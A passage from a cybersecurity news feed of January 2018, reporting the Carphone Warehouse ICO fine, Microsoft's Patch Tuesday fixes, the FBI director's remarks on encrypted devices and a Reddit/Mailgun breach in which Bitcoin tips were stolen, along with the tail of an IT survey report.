Despite these concerns, internal security audits are infrequent, the report found. Nearly two-thirds of companies perform security audits on their systems, but the most common schedule was to do it on an annual basis (39%). Another 10% of respondents audit every two years or more, which, given an ever-changing IT environment, could expose a company to risk.

The report also found that data sharing is seen as critical but challenging. About half (53%) of companies surveyed have multiple databases and share data to improve business intelligence, largely through scripting (42%), followed by backup/restore/snapshot processes and FTP/SCP/file transfer (38% each). The average company uses two different methods, adding to the complexity. In turn, this bolsters security concerns.

“IT leaders are under immense pressure to provide an enterprise infrastructure that can sustain severe threats and secure vital information while enabling data accessibility and business intelligence,” said Terry Plath, vice president, Global Services, Syncsort. “Business resilience requires the right mix of planning and technology, and this survey did a thorough job of uncovering how businesses are tackling this increasingly complex and multi-faceted challenge.”

Categories: Cyber Risk News

Carphone Warehouse Breach Results in £400K Fine

Wed, 01/10/2018 - 12:04
Carphone Warehouse Breach Results in £400K Fine

The Carphone Warehouse has become the latest UK firm to be slapped with a massive ICO fine after a 2015 data breach compromised the personal information of millions of customers.

The electronics and mobile phone retailer, owned by Dixons Carphone, was fined £400,000 by the ICO after failing to adequately secure its systems. Hackers accessed data on over three million customers including names, addresses, phone numbers, dates of birth and marital status.

Some 18,000 customers had historical payment details accessed, while 1000 employees had data including name, phone numbers, postcode and car registration exposed to the hackers.

The attackers are said to have accessed the data by using valid log-ins for out-of-date WordPress software.

The ICO claimed Carphone Warehouse failed to delete historical data from its records, carry out routine security testing or keep software up-to-date.

“A company as large, well-resourced, and established as Carphone Warehouse should have been actively assessing its data security systems, and ensuring systems were robust and not vulnerable to such attacks,” said information commissioner, Elizabeth Denham, in a statement.

“Carphone Warehouse should be at the top of its game when it comes to cybersecurity, and it is concerning that the systemic failures we found related to rudimentary, commonplace measures.”

She added that companies need to put in place layered security to help mitigate growing online threats.

The firm may have been saved from a bigger fine by taking steps to fix some of the problems identified, and because the data has not yet resulted in any identity fraud.

The fine puts Carphone Warehouse up there with TalkTalk in terms of the largest ever penalties levied.

The ISP was slapped with a £400,000 penalty after a 2015 breach but then received a further £100,000 for a separate issue relating to data access by a third-party supplier.

Carphone Warehouse would most likely have been hit with an even bigger fine had the incident occurred after May 25, when the GDPR comes into force. It will give the ICO and other regulators around Europe the power to fine organizations up to 4% of global annual turnover, or £17m.

Categories: Cyber Risk News

Patch Tuesday: More Work for Admins with 56 Flaws to Fix

Wed, 01/10/2018 - 11:19
Patch Tuesday: More Work for Admins with 56 Flaws to Fix

Microsoft heaped more work on IT administrators this week with a Patch Tuesday update round that will bring the total CVEs addressed in January to 55, including four public disclosures and one zero-day vulnerability.

The zero-day (CVE-2018-0802) is an Office vulnerability which could allow a remote attacker to take control of an affected system.

“The attacker in this case, could create a specially crafted file or host specially crafted content on a compromised website or user contributed content on a website,” explained Ivanti director of product management, Chris Goettl. “A user opening these specially crafted files would allow the exploit to run giving the attacker equal rights to the system as the current user.”

The issue could also be mitigated by users running with fewer privileges, he said.

A previously unseen public disclosure (CVE-2018-0819) relates to the Mailsploit vulnerability in Outlook for Mac and could apparently allow an attacker to circumvent email anti-spoofing mechanisms like DMARC.

The remaining three public disclosures were published last week and relate to the Meltdown and Spectre chip issues.

The former is fixed with code changes to the kernel and the latter two flaws via firmware updates, so OS and firmware updates must be installed to fully mitigate these attack methods, according to Goettl.

However, admins have been warned to thoroughly test these updates as reports suggest there could be varying degrees of performance degradation, as well as possible BSOD due to compatibility issues with third-party AV tools.

Microsoft has also halted the deployment of patches for some AMD systems after some users reported their devices got into an “unbootable state.”

Qualys director of product management, Jimmy Graham, claimed that after Spectre and Meltdown patches, the focus for workstation environments should be on fixing Outlook vulnerability CVE-2018-0793 and Word flaw CVE-2018-0794.

Also this month, Adobe released a Priority 2 update for Flash Player (APSB18-01), which fixes out-of-bounds read bug CVE-2018-4871.

Apple released iOS 11.2.2 yesterday as well as a macOS High Sierra 10.13.2 update to help mitigate issues relating to the Spectre chip flaws.

Categories: Cyber Risk News

FBI Boss: We Don’t Want Backdoors, but We Do Want Access to Encrypted Devices

Wed, 01/10/2018 - 10:26
FBI Boss: We Don’t Want Backdoors, but We Do Want Access to Encrypted Devices

The FBI has nearly 7800 devices it can’t access because of encryption, according to its director, who repeated calls yesterday for tech providers to find a solution to the issue that doesn’t involve creating backdoors.

In a speech to the International Conference on Cyber Security, Wray claimed the Feds were unable to access 7775 encrypted devices last year — far higher than the 6900 figure touted in October.

He argued this was fast becoming an “urgent public safety issue” which would only get worse over time unless US technology companies engineer a “responsible” solution.

“We’re not looking for a ‘back door’ – which I understand to mean some type of secret, insecure means of access,” he said. “What we’re asking for is the ability to access the device once we’ve obtained a warrant from an independent judge, who has said we have probable cause.”

However, experts have argued that the only way to give the FBI what it’s asking for is indeed engineering a de facto backdoor.

This would put the privacy and security of hundreds of millions of devices potentially at risk if it fell into the wrong hands, and could even be abused by over-reaching law enforcers, whilst putting pressure on providers like Apple to do the same in countries with poor human rights records, the argument goes.

Whilst admitting a possible solution “isn’t so clear-cut,” Wray’s main line of argument was that US companies lead the world in innovation, so they should be able to find a way to allow law enforcers limited access to devices for which they have a warrant, without breaking security for law-abiding users.

He also claimed that US tech firms are already acceding to requests for customer data by foreign governments, although crucially didn’t go as far as to claim firms like Apple had broken their own encryption to do so.

“The FBI supports information security measures, including strong encryption,” said Wray. “But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep this country safe.”

The news comes as researchers unveiled a new end-to-end encrypted group chat protocol, dubbed Asynchronous Ratcheting Tree (ART).

Facebook and Oxford University teamed up on the project, which overcomes inadequacies in current solutions where if one member of the group is hacked then all conversations can be accessed.

This latest innovation in encrypted messaging is unlikely to go down well with law enforcers on either side of the Atlantic.

Categories: Cyber Risk News

Reddit Users Lose Bitcoin Tips After Third-Party Breach

Tue, 01/09/2018 - 20:10
Reddit Users Lose Bitcoin Tips After Third-Party Breach

Reddit has confirmed that one of its email providers, Mailgun, has been breached, resulting in the hacks of user profiles and their linked cryptocurrency accounts.

Attackers infiltrated Reddit accounts using password reset emails sent via the third-party vendor. Several Redditors also reported that their Bitcoin Cash tip accounts had been emptied out.

Despite the alarming details, Reddit urged the public to maintain perspective, noting that the attackers “did not have access to either Reddit’s systems or to a Redditor’s email account,” adding that the number of confirmed impacted users is less than 20 so far.

“On 12/31, Reddit received several reports regarding password reset emails that were initiated and completed without the account owners’ requests,” Reddit explained in a post. “We have been working to investigate the issue and coordinating with Mailgun, a third-party vendor we’ve been using to send some of our account emails including password reset emails,” it continued. “A malicious actor targeted Mailgun and gained access to Reddit’s password reset emails….We know this is frustrating as a user, and we have put additional controls in place to help make sure it doesn’t happen again.”

Mailgun, for its part, said that it has identified the attack vector—an employee’s compromised email account—and has patched the issue.

“On January 3, 2018, Mailgun became aware of an incident in which a customer’s API key was compromised and immediately began diagnostics to help determine the cause and the scope of impact,” Mailgun CTO Josh Odom wrote in a post. “We immediately closed the point of access to the unauthorized user and deployed additional technical safeguards to further protect this sensitive portion of our application.”

He added that the attack affected less than 1% of Mailgun’s entire customer base.

Categories: Cyber Risk News

Pages